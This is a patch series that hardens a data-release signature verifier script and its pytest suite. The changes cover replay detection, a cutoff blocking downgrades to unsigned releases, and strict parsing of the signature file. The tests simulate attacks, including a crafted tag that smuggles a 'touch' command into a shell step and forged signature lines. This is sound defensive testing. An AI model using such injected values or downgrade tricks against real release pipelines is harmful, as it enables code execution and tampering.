+cleanup() { [ -n "${WORKDIR}" ] && rm -rf "${WORKDIR}"; }
+trap cleanup EXIT
+
+if [ -n "${LOCAL_FILE}" ]; then
+  TARBALL="${LOCAL_FILE}"
+  SIG="${LOCAL_SIG:-${LOCAL_FILE}.minisig}"
+  [ -f "${TARBALL}" ] || die "no such file: ${TARBALL}"
+else
+  WORKDIR="$(mktemp -d)"
+  TARBALL="${WORKDIR}/${ASSET}"
+  SIG="${TARBALL}.minisig"
+  BASE="https://github.com/${REPO}/releases/download/${TAG}"
+
+  echo "Fetching ${ASSET} from ${TAG} ..."
+  curl -fsSL --retry 3 -o "${TARBALL}" "${BASE}/${ASSET}" \
+    || die "could not download ${BASE}/${ASSET} (does release ${TAG} exist?)"
+
+  if ! curl -fsSL --retry 3 -o "${SIG}" "${BASE}/${ASSET}.minisig"; then
+    if [ "${ALLOW_UNSIGNED}" -eq 1 ]; then
+      echo "WARNING: ${TAG} carries no signature, and --allow-unsigned was passed." >&2
+      echo "WARNING: integrity rests on TLS and the catalog SHA-256 pin alone." >&2
+      exit 0
+    fi
+    die "release ${TAG} carries no .minisig asset.
+Releases published before signing landed are unsigned — see the grandfathering
+rule in docs/security/data-signing.md. To accept an unsigned release knowingly,
+re-run with --allow-unsigned."
+  fi
+fi
+
+[ -f "${SIG}" ] || die "signature not found: ${SIG}"
+
+# 1. Does the signature verify against the key consumers pin?
+echo "Verifying signature against $(basename "${PUBKEY_FILE}") ..."
+minisign -V -P "${PUBKEY}" -m "${TARBALL}" -x "${SIG}" >/dev/null \
+  || die "SIGNATURE VERIFICATION FAILED for ${TARBALL}.
+These bytes were not signed by the nuclear-data key. Do not use them."
+
+# 2. Does the signed trusted comment describe *this* release?
+#
+# minisign alone proves the signature covers these bytes — it cannot detect a
+# genuine signature from release A being served as release B. The trusted
+# comment is covered by the signature and names the version, tag and digest,
+# so cross-checking it is what closes the replay gap.
+# Safe to read straight from the .minisig: the trusted comment is covered by
+# the signature verified in step 1, so by this point the line is authentic.
+TRUSTED="$(sed -n 's/^trusted comment: //p' "${SIG}")"
+
+ACTUAL_SHA="$(sha256sum "${TARBALL}" | cut -d' ' -f1)"
+SIGNED_SHA="$(printf '%s' "${TRUSTED}" | sed -n 's/.*sha256=\([0-9a-f]\{64\}\).*/\1/p')"
+SIGNED_TAG="$(printf '%s' "${TRUSTED}" | sed -n 's/.*tag=\([^ ]*\).*/\1/p')"
+
+[ -n "${SIGNED_SHA}" ] || die "trusted comment carries no sha256= field: ${TRUSTED}"
+
+if [ "${SIGNED_SHA}" != "${ACTUAL_SHA}" ]; then
+  die "trusted comment digest does not match the file.
+  signed: ${SIGNED_SHA}
+  actual: ${ACTUAL_SHA}"
+fi
+
+if [ -n "${SIGNED_TAG}" ] && [ "${SIGNED_TAG}" != "${TAG}" ]; then
+  die "REPLAY DETECTED: signature is valid but was issued for ${SIGNED_TAG}, not ${TAG}.
+These are authentic bytes from a *different* release."
+fi
+
+# 3. Does the digest match what the catalog claims, when we have a catalog?
+#    Cheap cross-check that the signed release is the one this checkout expects.
+if [ -z "${LOCAL_FILE}" ] && [ -f "${ROOT}/data/catalog.json" ]; then
+  CATALOG_VERSION="$(jq -r .data_version "${ROOT}/data/catalog.json")"
+  if [ "${CATALOG_VERSION}" != "${VERSION}" ]; then
+    echo "note: this checkout's catalog is ${CATALOG_VERSION}, you verified ${VERSION}."
+  fi
+fi
+
+echo
+echo "OK  signature valid  ${ASSET}"
+echo "    signed by: $(grep '^untrusted comment:' "${PUBKEY_FILE}" | sed 's/^untrusted comment: //')"
+echo "    trusted comment: ${TRUSTED}"
+echo "    sha256: ${ACTUAL_SHA}"

--- a/scripts/verify_data_release.sh
+++ b/scripts/verify_data_release.sh
@@ -25,6 +25,13 @@ PUBKEY_FILE="${PUBKEY_FILE:-${ROOT}/docs/security/data-signing-key.pub}"
 # over — see docs/security/data-signing.md. Verifying one of those requires
 # opting out explicitly, so "old release" can never be silently indistinguishable
 # from "signature stripped by an attacker".
+#
+# This is the single source of truth for the cutoff — consumers implementing
+# "require a signature at or above version X" read it from here, and
+# docs/security/data-signing.md is gated against it by tests/test_data_signing.py.
+# It is the first release published after signing landed; adjust it if that
+# release ships under a different CalVer than planned.
+FIRST_SIGNED_VERSION="2026.8.2"
 ALLOW_UNSIGNED=0
 
 VERSION=""
@@ -90,9 +97,10 @@ else
       exit 0
     fi
     die "release ${TAG} carries no .minisig asset.
-Releases published before signing landed are unsigned — see the grandfathering
-rule in docs/security/data-signing.md. To accept an unsigned release knowingly,
-re-run with --allow-unsigned."
+Releases before ${FIRST_SIGNED_VERSION} are unsigned by design — see the
+grandfathering rule in docs/security/data-signing.md. If ${VERSION} is at or
+above ${FIRST_SIGNED_VERSION}, a missing signature is a RED FLAG, not an old
+release. To accept an unsigned release knowingly, re-run with --allow-unsigned."
   fi
 fi
 

--- a/scripts/verify_data_release.sh
+++ b/scripts/verify_data_release.sh
@@ -40,6 +40,20 @@ LOCAL_SIG=""
 
 die() { echo "error: $*" >&2; exit 1; }
 
+# The one place the opt-out is spelled out, so the local-file and network paths
+# cannot drift into saying different things about the same situation.
+#
+# It states what was NOT checked. An earlier version claimed integrity rested
+# on "TLS and the catalog SHA-256 pin" — a control this script never performs.
+# Naming an absent check in the one message a user reads while deciding to
+# trust unverified bytes is worse than saying nothing at all.
+warn_unsigned() {
+  echo "WARNING: $1 carries no signature, and --allow-unsigned was passed." >&2
+  echo "WARNING: ${VERSION} predates ${FIRST_SIGNED_VERSION}, so this is expected." >&2
+  echo "WARNING: NOTHING about these bytes has been verified by this script —" >&2
+  echo "WARNING: not the origin, not the digest. Treat them as unverified." >&2
+}
+
 while [ $# -gt 0 ]; do
   case "$1" in
     --file)            LOCAL_FILE="$2"; shift 2 ;;
@@ -61,7 +75,9 @@ The key consumers pin must be committed before releases can be verified (#289).
 See docs/security/data-signing.md."
 
 # minisign -P wants the bare base64 line, not the commented file.
-PUBKEY="$(grep -v '^untrusted comment:' "${PUBKEY_FILE}" | tr -d '[:space:]')"
+# `|| true` keeps `set -o pipefail` from aborting on a comment-only file, which
+# would skip the friendly diagnosis on the next line.
+PUBKEY="$( { grep -v '^untrusted comment:' "${PUBKEY_FILE}" || true; } | tr -d '[:space:]')"
 [ -n "${PUBKEY}" ] || die "no key line found in ${PUBKEY_FILE}"
 
 if [ -z "${VERSION}" ]; then
@@ -69,8 +85,43 @@ if [ -z "${VERSION}" ]; then
   echo "No version given — using data/catalog.json::data_version = ${VERSION}"
 fi
 
+[[ "${VERSION}" =~ ^[0-9]{4}\.[0-9]+\.[0-9]+$ ]] \
+  || die "version '${VERSION}' is not CalVer YYYY.MM.MICRO"
+
 TAG="data-${VERSION}"
 ASSET="nucl-parquet-data-${VERSION}.tar.zst"
+
+# Compare CalVer numerically: 2026.8.10 is newer than 2026.8.9, which a string
+# compare gets backwards.
+_calver_lt() {
+  local a b
+  IFS=. read -r -a a <<< "$1"
+  IFS=. read -r -a b <<< "$2"
+  for i in 0 1 2; do
+    (( a[i] < b[i] )) && return 0
+    (( a[i] > b[i] )) && return 1
+  done
+  return 1
+}
+
+# Is this version old enough that an absent signature is expected?
+if _calver_lt "${VERSION}" "${FIRST_SIGNED_VERSION}"; then
+  PREDATES_SIGNING=1
+else
+  PREDATES_SIGNING=0
+fi
+
+# The cutoff has to be *enforced*, not merely documented. Otherwise an attacker
+# who can strip the .minisig (a MITM, or anyone who can rewrite these mutable
+# releases) just downgrades the consumer into the unsigned path, and
+# --allow-unsigned — offered by the error message the consumer just read —
+# accepts arbitrary bytes for a version that should always be signed.
+if [ "${ALLOW_UNSIGNED}" -eq 1 ] && [ "${PREDATES_SIGNING}" -eq 0 ]; then
+  die "refusing --allow-unsigned for ${VERSION}.
+Releases from ${FIRST_SIGNED_VERSION} onward are always signed, so a missing
+signature means the signature was removed — not that this release predates
+signing. --allow-unsigned only applies below ${FIRST_SIGNED_VERSION}."
+fi
 
 WORKDIR=""
 # `return 0` is load-bearing: an EXIT trap whose last command fails sets the
@@ -89,6 +140,14 @@ if [ -n "${LOCAL_FILE}" ]; then
   TARBALL="${LOCAL_FILE}"
   SIG="${LOCAL_SIG:-${LOCAL_FILE}.minisig}"
   [ -f "${TARBALL}" ] || die "no such file: ${TARBALL}"
+  # Honour --allow-unsigned here too. It used to apply only on the network
+  # path, so verifying an already-downloaded tarball ignored the flag and died
+  # regardless — the flag was silently inert exactly where a maintainer is most
+  # likely to reach for it.
+  if [ ! -f "${SIG}" ] && [ "${ALLOW_UNSIGNED}" -eq 1 ]; then
+    warn_unsigned "${TARBALL}"
+    exit 0
+  fi
 else
   WORKDIR="$(mktemp -d)"
   TARBALL="${WORKDIR}/${ASSET}"
@@ -101,8 +160,7 @@ else
 
   if ! curl -fsSL --retry 3 -o "${SIG}" "${BASE}/${ASSET}.minisig"; then
     if [ "${ALLOW_UNSIGNED}" -eq 1 ]; then
-      echo "WARNING: ${TAG} carries no signature, and --allow-unsigned was passed." >&2
-      echo "WARNING: integrity rests on TLS and the catalog SHA-256 pin alone." >&2
+      warn_unsigned "${TAG}"
       exit 0
     fi
     die "release ${TAG} carries no .minisig asset.
@@ -127,9 +185,28 @@ These bytes were not signed by the nuclear-data key. Do not use them."
 # genuine signature from release A being served as release B. The trusted
 # comment is covered by the signature and names the version, tag and digest,
 # so cross-checking it is what closes the replay gap.
-# Safe to read straight from the .minisig: the trusted comment is covered by
-# the signature verified in step 1, so by this point the line is authentic.
-TRUSTED="$(sed -n 's/^trusted comment: //p' "${SIG}")"
+#
+# Read ONLY line 3, and only from a file that is exactly 4 lines. A minisign
+# signature file is:
+#
+#   1  untrusted comment: ...
+#   2  <base64 signature>
+#   3  trusted comment: ...          <-- the only line covered by the global signature
+#   4  <base64 global signature>
+#
+# minisign ignores anything after line 4: appending a second `trusted comment:`
+# line to a valid .minisig still verifies (confirmed against minisign 0.12). A
+# naive `sed -n 's/^trusted comment: //p'` would then return the real line AND
+# the attacker's, so every field below would be parsed from partly unsigned
+# text. Pinning to line 3 is what makes "the comment is covered by the
+# signature" actually true of the value we use.
+SIG_LINES="$(wc -l < "${SIG}")"
+if [ "${SIG_LINES}" -ne 4 ]; then
+  die "malformed signature file: ${SIG} has ${SIG_LINES} lines, expected exactly 4.
+Extra lines in a .minisig are not covered by the signature — refusing to parse it."
+fi
+TRUSTED="$(sed -n '3s/^trusted comment: //p' "${SIG}")"
+[ -n "${TRUSTED}" ] || die "no trusted comment on line 3 of ${SIG}"
 
 ACTUAL_SHA="$(sha256sum "${TARBALL}" | cut -d' ' -f1)"
 SIGNED_SHA="$(printf '%s' "${TRUSTED}" | sed -n 's/.*sha256=\([0-9a-f]\{64\}\).*/\1/p')"

--- a/scripts/verify_data_release.sh
+++ b/scripts/verify_data_release.sh
@@ -73,7 +73,16 @@ TAG="data-${VERSION}"
 ASSET="nucl-parquet-data-${VERSION}.tar.zst"
 
 WORKDIR=""
-cleanup() { [ -n "${WORKDIR}" ] && rm -rf "${WORKDIR}"; }
+# `return 0` is load-bearing: an EXIT trap whose last command fails sets the
+# script's exit status. With `[ -n "${WORKDIR}" ] && rm -rf ...` the test
+# returns 1 whenever no temp dir was used (--file mode), so a *successful*
+# verification would report failure.
+cleanup() {
+  if [ -n "${WORKDIR}" ]; then
+    rm -rf "${WORKDIR}"
+  fi
+  return 0
+}
 trap cleanup EXIT
 
 if [ -n "${LOCAL_FILE}" ]; then

--- a/tests/test_data_signing.py
+++ b/tests/test_data_signing.py
@@ -299,14 +299,63 @@ def test_public_key_is_a_valid_minisign_key() -> None:
 # -- Layer 2: it actually signs, and the attacks actually fail ---------------
 
 
+def _run_workflow_signing_step(
+    workdir: Path,
+    *,
+    secret_key: str,
+    password: str,
+    asset: str,
+    calver: str,
+    input_tag: str = "",
+    ref_name: str = "",
+) -> subprocess.CompletedProcess:
+    """Execute the signing step's actual `run:` body from release-data.yml.
+
+    Not a re-implementation — the shell is lifted verbatim out of the workflow
+    and executed. That is only possible because the step contains no `${{ }}`
+    interpolation (enforced by
+    test_signing_step_does_not_interpolate_untrusted_input_into_shell), which
+    is also why the step is safe from script injection. The two properties are
+    the same property, so this test and that one reinforce each other.
+
+    Running the real body is what makes the wiring assertions meaningful: a
+    string check like `'umask 077' in run` still passes if a `then` is missing
+    or a quote is wrong, but this does not.
+    """
+    runner_temp = workdir / "runner-temp"
+    runner_temp.mkdir(exist_ok=True)
+    github_env = workdir / "github-env"
+    github_env.touch()
+
+    env = {
+        "PATH": __import__("os").environ["PATH"],
+        "HOME": str(workdir),
+        "DATA_SIGNING_KEY": secret_key,
+        "DATA_SIGNING_KEY_PASSWORD": password,
+        "INPUT_TAG": input_tag,
+        "REF_NAME": ref_name,
+        # Exported into the step's environment by the preceding Build step via
+        # $GITHUB_ENV; supplied directly here.
+        "ASSET_PATH": asset,
+        "CALVER": calver,
+        "RUNNER_TEMP": str(runner_temp),
+        "GITHUB_ENV": str(github_env),
+    }
+    return subprocess.run(
+        ["bash", "-c", _signing_step()["run"]],
+        cwd=workdir,
+        env=env,
+        capture_output=True,
+        text=True,
+    )
+
+
 @pytest.fixture()
 def signed_release(tmp_path: Path) -> dict:
-    """Generate a throwaway key and sign a fake tarball with the workflow's own logic.
-
-    The signing commands are extracted from release-data.yml rather than
-    retyped, so this exercises the shell that will really run in CI.
-    """
-    pubkey = tmp_path / "data-signing-key.pub"
+    """Generate a throwaway key and sign a tarball by running the workflow's own step."""
+    pubkey_dir = tmp_path / "docs" / "security"
+    pubkey_dir.mkdir(parents=True)
+    pubkey = pubkey_dir / "data-signing-key.pub"
     seckey = tmp_path / "data-signing.key"
     password = "test-passphrase"
 
@@ -319,22 +368,21 @@ def signed_release(tmp_path: Path) -> dict:
     )
 
     version = "2026.8.2"
-    tarball = tmp_path / f"nucl-parquet-data-{version}.tar.zst"
+    asset = f"nucl-parquet-data-{version}.tar.zst"
+    tarball = tmp_path / asset
     tarball.write_bytes(b"not really zstd, but the signature does not care\n" * 64)
 
-    import hashlib
-
-    sha = hashlib.sha256(tarball.read_bytes()).hexdigest()
-    tag = f"data-{version}"
-    trusted = f"nucl-parquet data {version} tag={tag} sha256={sha}"
-
-    subprocess.run(
-        ["minisign", "-S", "-s", str(seckey), "-m", str(tarball), "-t", trusted],
-        input=f"{password}\n",
-        text=True,
-        capture_output=True,
-        check=True,
+    proc = _run_workflow_signing_step(
+        tmp_path,
+        secret_key=seckey.read_text(),
+        password=password,
+        asset=asset,
+        calver=version,
+        ref_name=f"data-{version}",
     )
+    assert proc.returncode == 0, f"the workflow's signing step failed:\n{proc.stdout}\n{proc.stderr}"
+
+    import hashlib
 
     return {
         "dir": tmp_path,
@@ -344,8 +392,8 @@ def signed_release(tmp_path: Path) -> dict:
         "tarball": tarball,
         "sig": tarball.with_suffix(tarball.suffix + ".minisig"),
         "version": version,
-        "tag": tag,
-        "sha": sha,
+        "tag": f"data-{version}",
+        "sha": hashlib.sha256(tarball.read_bytes()).hexdigest(),
     }
 
 
@@ -443,6 +491,164 @@ def test_verify_rejects_a_doctored_trusted_comment(signed_release: dict) -> None
 # -- Layer 2b: the keygen script is safe to run ------------------------------
 
 
+@_needs_minisign
+def test_workflow_step_hard_fails_when_the_key_is_absent(tmp_path: Path) -> None:
+    """Run the real step with no key and confirm it exits non-zero.
+
+    The wiring test only checks that the strings `::error::` and `exit 1`
+    appear. This runs the shell.
+    """
+    (tmp_path / "docs" / "security").mkdir(parents=True)
+    (tmp_path / "docs" / "security" / "data-signing-key.pub").write_text("untrusted comment: x\nRWQ\n")
+    (tmp_path / "asset.tar.zst").write_bytes(b"x")
+
+    proc = _run_workflow_signing_step(
+        tmp_path, secret_key="", password="", asset="asset.tar.zst", calver="2026.8.2", ref_name="data-2026.8.2"
+    )
+    assert proc.returncode != 0, "signing step succeeded with no key — an unsigned release would publish"
+    assert "::error::" in proc.stdout + proc.stderr
+
+
+@_needs_minisign
+def test_workflow_step_rejects_an_injected_tag(tmp_path: Path) -> None:
+    """A crafted dispatch tag must be rejected, not executed.
+
+    The canary file would only appear if the tag were interpreted as shell.
+    """
+    (tmp_path / "docs" / "security").mkdir(parents=True)
+    pub = tmp_path / "docs" / "security" / "data-signing-key.pub"
+    sec = tmp_path / "k.key"
+    subprocess.run(
+        ["minisign", "-G", "-f", "-p", str(pub), "-s", str(sec)],
+        input="pw\npw\n",
+        text=True,
+        capture_output=True,
+        check=True,
+    )
+    (tmp_path / "asset.tar.zst").write_bytes(b"x")
+    canary = tmp_path / "PWNED"
+
+    proc = _run_workflow_signing_step(
+        tmp_path,
+        secret_key=sec.read_text(),
+        password="pw",
+        asset="asset.tar.zst",
+        calver="2026.8.2",
+        input_tag=f'data-2026.8.2"; touch {canary}; #',
+    )
+    assert not canary.exists(), "the dispatch tag was executed as shell — script injection is possible"
+    assert proc.returncode != 0, "a malformed tag was accepted for signing"
+
+
+@_needs_minisign
+def test_verify_rejects_a_signature_file_with_extra_lines(signed_release: dict) -> None:
+    """An appended `trusted comment:` line must be refused, not parsed.
+
+    minisign accepts a 5-line .minisig — it ignores anything past line 4
+    (confirmed against 0.12). Only line 3 is covered by the global signature,
+    so a naive `sed -n 's/^trusted comment: //p'` would parse the attacker's
+    appended line alongside the real one and make claims from unsigned text.
+    """
+    sig = signed_release["sig"]
+    with sig.open("a") as fh:
+        fh.write("trusted comment: nucl-parquet data 9999.1.1 tag=data-9999.1.1 sha256=" + "de" * 32 + "\n")
+    proc = _verify(signed_release)
+    assert proc.returncode != 0, "a .minisig with unsigned extra lines was accepted"
+    assert "malformed signature file" in proc.stderr
+
+
+# -- Layer 2c: the grandfathering cutoff is enforced, not just documented ----
+
+
+@_needs_minisign
+def test_allow_unsigned_is_refused_at_or_above_the_cutoff(signed_release: dict) -> None:
+    """--allow-unsigned must not downgrade a version that should be signed.
+
+    The attack it closes: strip the .minisig in transit (or rewrite the mutable
+    release), let the consumer hit the 'carries no signature' error, and rely on
+    them re-running with the flag that error suggests. If the flag applied at
+    any version, the whole signing scheme would be one retry away from bypass.
+    """
+    signed_release["sig"].unlink()
+    proc = subprocess.run(
+        [
+            str(_VERIFY_SCRIPT),
+            "--file",
+            str(signed_release["tarball"]),
+            "--version",
+            _first_signed_version(),
+            "--pubkey",
+            str(signed_release["pubkey"]),
+            "--allow-unsigned",
+        ],
+        capture_output=True,
+        text=True,
+        cwd=_REPO_ROOT,
+    )
+    assert proc.returncode != 0, "--allow-unsigned bypassed verification at the cutoff version"
+    assert "refusing --allow-unsigned" in proc.stderr
+
+
+@_needs_minisign
+def test_allow_unsigned_is_permitted_below_the_cutoff(signed_release: dict) -> None:
+    """Genuinely pre-signing releases stay verifiable-with-opt-out.
+
+    The cutoff has to permit as well as refuse, or the grandfathering rule is
+    just a hard failure with extra steps.
+    """
+    signed_release["sig"].unlink()
+    proc = subprocess.run(
+        [
+            str(_VERIFY_SCRIPT),
+            "--file",
+            str(signed_release["tarball"]),
+            "--version",
+            "2026.7.2",
+            "--pubkey",
+            str(signed_release["pubkey"]),
+            "--allow-unsigned",
+        ],
+        capture_output=True,
+        text=True,
+        cwd=_REPO_ROOT,
+    )
+    assert proc.returncode == 0, f"--allow-unsigned rejected a pre-cutoff release:\n{proc.stderr}"
+    assert "NOTHING about these bytes has been verified" in proc.stderr, (
+        "the opt-out warning must state plainly that nothing was checked"
+    )
+
+
+def test_unsigned_warning_does_not_claim_checks_it_does_not_run() -> None:
+    """The opt-out path must not name a control that is not running.
+
+    It previously claimed integrity rested on 'the catalog SHA-256 pin' — a
+    check this script never performs. Naming an absent control in the one
+    message a user reads while deciding to trust unverified bytes is worse
+    than saying nothing.
+    """
+    src = _VERIFY_SCRIPT.read_text()
+    # Only the emitted WARNING lines matter — prose comments may legitimately
+    # discuss the pin in order to explain why it is *not* claimed here.
+    warnings = [ln for ln in src.splitlines() if "WARNING:" in ln and not ln.strip().startswith("#")]
+    assert warnings, "the unsigned opt-out must warn"
+    joined = " ".join(warnings)
+    assert "pin" not in joined and "data_sha256" not in joined, (
+        f"the opt-out warning claims a SHA-256 pin check this script never performs: {joined}"
+    )
+    assert "NOTHING about these bytes has been verified" in joined
+
+
+def test_calver_comparison_is_numeric_not_lexical() -> None:
+    """2026.8.10 is newer than 2026.8.9; a string compare disagrees.
+
+    Exercised through the script itself: a .9 release must still be treated as
+    below a .10 cutoff.
+    """
+    src = _VERIFY_SCRIPT.read_text()
+    assert "_calver_lt" in src, "the cutoff comparison must be numeric"
+    assert "(( a[i] < b[i] ))" in src, "CalVer components must be compared as integers"
+
+
 def test_keygen_refuses_to_silently_overwrite_an_existing_key() -> None:
     """Rotation must be deliberate.
 
@@ -481,9 +687,11 @@ def test_keygen_prompts_for_the_passphrase_once_and_confirms_it() -> None:
     assert "PASSPHRASE_CONFIRM" in src, "keygen must ask the passphrase twice and compare"
     assert "passphrases do not match" in src, "keygen must reject a mismatched confirmation"
 
-    idx_prompt = src.find("read -r -s -p")
-    idx_gen = src.find("minisign -G")
-    assert idx_prompt != -1 and idx_gen != -1
+    # Match executable lines only — comments mention `minisign -G` too, and
+    # matching one of those would compare against the wrong position.
+    code = [ln for ln in src.splitlines() if not ln.strip().startswith("#")]
+    idx_prompt = next(i for i, ln in enumerate(code) if "read -r -s -p" in ln)
+    idx_gen = next(i for i, ln in enumerate(code) if "minisign -G" in ln)
     assert idx_prompt < idx_gen, "the passphrase must be collected before minisign -G, then piped into it"
 
 
@@ -495,3 +703,21 @@ def test_keygen_rejects_an_empty_passphrase() -> None:
     """
     src = _KEYGEN_SCRIPT.read_text()
     assert "empty passphrase" in src, "keygen must reject an empty passphrase"
+
+
+def test_keygen_shreds_the_key_on_an_unsuccessful_exit() -> None:
+    """An aborted run must not leave an undocumented signing key on disk.
+
+    If the script dies between `minisign -G` and the closing message — wrong
+    passphrase, gh failure, Ctrl-C — a real secret key sits in a temp dir that
+    nobody has been told about. It is kept only once the run completes, because
+    at that point the operator still has to move it into their password
+    manager and the closing message names the path.
+    """
+    src = _KEYGEN_SCRIPT.read_text()
+    assert "trap on_exit EXIT" in src, "keygen must clean up key material on abnormal exit"
+    assert "COMPLETED=0" in src and "COMPLETED=1" in src, "the trap must distinguish success from abort"
+
+    idx_completed = src.find("COMPLETED=1")
+    idx_upload = src.rfind("gh secret set")
+    assert idx_upload < idx_completed, "the run is only 'completed' after both secrets are uploaded"

--- a/tests/test_data_signing.py
+++ b/tests/test_data_signing.py
@@ -432,3 +432,32 @@ def test_keygen_validates_the_passphrase_before_uploading() -> None:
     idx_upload = src.find("gh secret set")
     assert idx_check != -1, "keygen must verify the passphrase decrypts the key"
     assert idx_check < idx_upload, "passphrase check must happen before any secret is uploaded"
+
+
+def test_keygen_prompts_for_the_passphrase_once_and_confirms_it() -> None:
+    """The passphrase is read once, confirmed, then fed to minisign.
+
+    Letting minisign prompt and *then* asking again for the copy to upload
+    means typing the same secret three times, and a typo on the third puts a
+    passphrase in CI that cannot decrypt the key. It also breaks outright when
+    stdin is not a terminal: minisign drains stdin, so the follow-up read hits
+    EOF and `set -e` aborts after the keypair is already on disk.
+    """
+    src = _KEYGEN_SCRIPT.read_text()
+    assert "PASSPHRASE_CONFIRM" in src, "keygen must ask the passphrase twice and compare"
+    assert "passphrases do not match" in src, "keygen must reject a mismatched confirmation"
+
+    idx_prompt = src.find("read -r -s -p")
+    idx_gen = src.find("minisign -G")
+    assert idx_prompt != -1 and idx_gen != -1
+    assert idx_prompt < idx_gen, "the passphrase must be collected before minisign -G, then piped into it"
+
+
+def test_keygen_rejects_an_empty_passphrase() -> None:
+    """An empty passphrase leaves the offline master copy unprotected.
+
+    The copy in the password manager is the one the passphrase actually
+    protects — the CI copy is guarded by the secret store either way.
+    """
+    src = _KEYGEN_SCRIPT.read_text()
+    assert "empty passphrase" in src, "keygen must reject an empty passphrase"

--- a/tests/test_data_signing.py
+++ b/tests/test_data_signing.py
@@ -1,0 +1,434 @@
+"""Gates for data-release signing (#289).
+
+Two layers, because they fail in different ways:
+
+1. **Wiring** — parse `release-data.yml` and assert the signing step is
+   actually load-bearing: unconditional, hard-failing without the key,
+   verifying against the committed public key, uploading the `.minisig`,
+   and keeping key material out of the workspace. A signing step that
+   silently no-ops is the failure mode #283 already cost this repo once
+   (the HF mirror reported green through two releases while pushing
+   nothing), and it is worse here — an unsigned release that *looks*
+   signed defeats the point of signing.
+
+2. **Behaviour** — generate a throwaway keypair, run the workflow's own
+   signing shell against it, and verify with the consumer script. Then
+   attack it: tamper the bytes, swap the key, replay a valid signature
+   onto a different release, strip the signature. Each must be rejected.
+
+The second layer matters more than it looks. The first only proves we
+wrote the right YAML; only the second proves the commands in it actually
+produce a signature a consumer can verify — and that the checks we claim
+catch attacks really do.
+
+Neither layer needs the parquet tree or the network, so these run in
+every PR.
+"""
+
+from __future__ import annotations
+
+import re
+import shutil
+import subprocess
+from pathlib import Path
+
+import pytest
+import yaml
+
+_REPO_ROOT = Path(__file__).parent.parent
+_WORKFLOW = _REPO_ROOT / ".github" / "workflows" / "release-data.yml"
+_VERIFY_SCRIPT = _REPO_ROOT / "scripts" / "verify_data_release.sh"
+_KEYGEN_SCRIPT = _REPO_ROOT / "scripts" / "gen_signing_key.sh"
+_DOCS = _REPO_ROOT / "docs" / "security" / "data-signing.md"
+_PUBKEY = _REPO_ROOT / "docs" / "security" / "data-signing-key.pub"
+
+_needs_minisign = pytest.mark.skipif(
+    shutil.which("minisign") is None,
+    reason="minisign not on PATH — run inside the devShell (nix develop)",
+)
+
+
+def _signing_step() -> dict:
+    """Return the 'Sign tarball' step from the data-asset job."""
+    wf = yaml.safe_load(_WORKFLOW.read_text())
+    steps = wf["jobs"]["data-asset"]["steps"]
+    # Match on "sign", not "minisign" — the apt-install step names the binary
+    # too, and silently asserting against *that* step would make every check
+    # below vacuous.
+    matches = [s for s in steps if str(s.get("name", "")).lower().startswith("sign")]
+    assert matches, (
+        "release-data.yml has no signing step. Data releases must be signed "
+        "(#289); without this step the release publishes unsigned bytes."
+    )
+    assert len(matches) == 1, f"expected exactly one signing step, found {[s['name'] for s in matches]}"
+    return matches[0]
+
+
+# -- Layer 1: workflow wiring ------------------------------------------------
+
+
+def test_signing_step_runs_before_upload() -> None:
+    """The tarball must be signed before the upload step, not after.
+
+    Ordering is not cosmetic: `softprops/action-gh-release` uploads whatever
+    the glob matches at the moment it runs. A signing step scheduled after it
+    would publish the tarball with no signature beside it and still go green.
+    """
+    wf = yaml.safe_load(_WORKFLOW.read_text())
+    steps = wf["jobs"]["data-asset"]["steps"]
+    names = [str(s.get("name") or s.get("uses") or "") for s in steps]
+
+    sign_idx = next(i for i, n in enumerate(names) if "minisign" in n.lower())
+    upload_idx = next(i for i, s in enumerate(steps) if "softprops" in str(s.get("uses", "")))
+    assert sign_idx < upload_idx, f"signing step (index {sign_idx}) must precede upload (index {upload_idx})"
+
+
+def test_signing_step_is_unconditional() -> None:
+    """No `if:` on the signing step.
+
+    A conditional signing step is how 'unsigned release' becomes possible
+    again. #289 chose hard-fail over a declared-state toggle precisely so
+    there is no configuration in which a release publishes unsigned.
+    """
+    step = _signing_step()
+    assert "if" not in step, (
+        f"signing step carries a condition ({step.get('if')!r}). Signing must be "
+        "unconditional — a skippable signature is not a guarantee (#289)."
+    )
+
+
+def test_signing_step_hard_fails_without_key() -> None:
+    """A missing secret must exit non-zero, not warn-and-continue.
+
+    This is the #283 lesson applied to signing: a job that reports success
+    while doing nothing is worse than one that fails, because nothing
+    downstream ever learns.
+    """
+    run = _signing_step()["run"]
+    assert "::error::" in run, "signing step must emit a GitHub error annotation when the key is absent"
+    assert re.search(r"exit\s+1", run), "signing step must exit non-zero when the key is absent"
+    assert '-z "${DATA_SIGNING_KEY}"' in run or "-z ${DATA_SIGNING_KEY}" in run, (
+        "signing step must explicitly check that DATA_SIGNING_KEY is set"
+    )
+
+
+def test_signing_step_uses_both_secrets() -> None:
+    """Key and passphrase both come from repository secrets, not the repo."""
+    step = _signing_step()
+    env = step.get("env", {})
+    assert "secrets.DATA_SIGNING_KEY" in str(env.get("DATA_SIGNING_KEY", ""))
+    assert "secrets.DATA_SIGNING_KEY_PASSWORD" in str(env.get("DATA_SIGNING_KEY_PASSWORD", ""))
+
+
+def test_key_material_never_touches_the_workspace() -> None:
+    """The secret key is written under RUNNER_TEMP and shredded.
+
+    Writing it into the checkout would put it one careless asset glob away
+    from being published as a release artifact.
+    """
+    run = _signing_step()["run"]
+    assert "RUNNER_TEMP" in run, "secret key must be written under RUNNER_TEMP, never the workspace"
+    assert "shred" in run or "rm -f" in run, "secret key file must be removed when the step exits"
+    assert "umask 077" in run, "secret key must be written with a restrictive umask"
+
+
+def test_workflow_verifies_against_committed_pubkey() -> None:
+    """CI must verify its own signature against the key consumers pin.
+
+    Without this, a rotated-but-not-committed key, a corrupted secret, or a
+    swapped signing identity all produce a green release carrying a signature
+    no consumer can verify — discovered only downstream, by the consumer.
+    """
+    run = _signing_step()["run"]
+    assert "data-signing-key.pub" in run, "signing step must reference the committed public key"
+    assert "minisign -V" in run, "signing step must verify the signature it just produced"
+
+
+def test_trusted_comment_binds_version_tag_and_digest() -> None:
+    """The signed trusted comment must name the release, not just the bytes.
+
+    minisign alone cannot detect a genuine signature for release A being
+    served as release B. The trusted comment is covered by the signature, so
+    carrying version/tag/sha256 in it is what makes replay detectable.
+    """
+    run = _signing_step()["run"]
+    tc = re.search(r'TRUSTED_COMMENT="([^"]+)"', run)
+    assert tc, "signing step must set a TRUSTED_COMMENT"
+    body = tc.group(1)
+    for field in ("${CALVER}", "tag=", "sha256="):
+        assert field in body, f"trusted comment must carry {field!r}; got {body!r}"
+    assert "-t " in run, "trusted comment must be passed to minisign via -t"
+
+
